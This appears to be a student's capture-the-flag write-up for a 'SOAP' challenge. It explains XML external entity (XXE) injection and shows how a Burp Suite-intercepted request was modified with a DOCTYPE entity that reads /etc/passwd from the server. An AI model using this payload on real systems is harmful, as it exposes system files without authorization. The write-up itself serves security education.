SOAP

XXE attack research

A hint suggests that the /etc/passwd of the insecure website’s back-end can be accessed through a XML external entity injection, or XXE attack. (Figure 1)

As of 2021, XXE remains one of the OWASP’s top 10 critical web application risks, changing to the category of 2021:A05-security misconfiguration risk from the A04 category in 2017. ^[1]

Based on readings from w3school, eXtensible Markup Language or XML is a markup language much like HTML, except its purpose is to carry data from the browser to the server instead of displaying them. In XML, a storage unit of data is called an entity, much like a variable in a programming language. ^[2]

According to OWASP, the XXE attack vector is a malicious XML document sent to the victim web app’s server by the attacker. Inside the XML document there is one or more external entity references with URI specifying the resource being targeted e.g. /etc/passwd and the attacker’s address. If the web app uses a poorly configured XML parser, it will process the external entity’s URI, retrieve the specified resource then send it to the attacker. ^[3]

Attack surface deduction

The web portal of the challenge presents no user input options other than a few ‘Details’ button that when clicked will presumably send HTTP POST requests to the server in order to display the ‘Special Info::::’ messages as responses. (Figure 2)

A relevant tool for this context is Burp Suite, a set of tools developed by Portswigger for penetration testing of web applications. ^[4]

The approach would be to click the ‘Details’ button, intercept the HTTP POST request with burpsuite, and check for any XML information being sent. If there are XML fields, external entities can be written before re-sending the POST request. Alternatively, the mention of SOAP protocol in the challenge’s name might indicate that clients can’t directly submit XML information, unless XIndicate mechanism is used.

Attack procedure

The URL of the website was entered into Burp Suite’s chromium browser. The ‘Intercept’ option in the ‘Proxy’ tab was turned on.

Clicking the ‘Details’ button on the web portal creates the following HTTP POST request which was intercepted by Burp Suite.

There is evidently a section of XML in the HTTP POST request, starting from line 13 (Figure 4), therefore the next step is to inject an external entity with the URI specifying the path to /etc/passwd.

To do this, one line containing the external entity needs to be added, then said entity must be called in the ID tag. Let’s give it the unique name of cleoptrata.

The following line is added below line 13. (Figure 5)

<!DOCTYPE injection [ <!ENTITY cleoptrata SYSTEM "file:///etc/passwd"> ]>

Where ‘injection’ is the name of root element, it can be anything e.g. foo, example etc. The name of the entity is cleoptrata and the SYSTEM specifies the entity as an external entity. These are followed by the path to the passwd file.

Note that in the ID tags, cleoptrata is called with:

&cleoptrata; 

To re-send this HTTP POST request back to the server, use ‘Send to Repeater’ then ‘send’ in Burp Suite. This then resulted in the server leaking the contents of the passwd file, revealing the flag. (Figure 6)

Context

In an educational environment such as the Computer Science website here, this attack is devastating in that attackers can find the username of past logins. The attacker could then try to obtain the shadow file for the passwords.

The results of this challenge also reveals information like Gnats Bug-Reporting System being a component of the web application’s network, which is valuable to an attacker’s Reconnaissance for subsequent attacks.

References

[1] OWASP, “OWASP Top Ten,” Owasp.org, 2021. https://owasp.org/www-project-top-ten/

[2] w3schools, “XML Introduction,” W3schools.com, 2015. https://www.w3schools.com/xml/xml_whatis.asp

[3] “XML External Entity (XXE) Processing | OWASP,” owasp.org. https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

[4] portswigger, “What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy,” portswigger.net. https://portswigger.net/web-security/xxe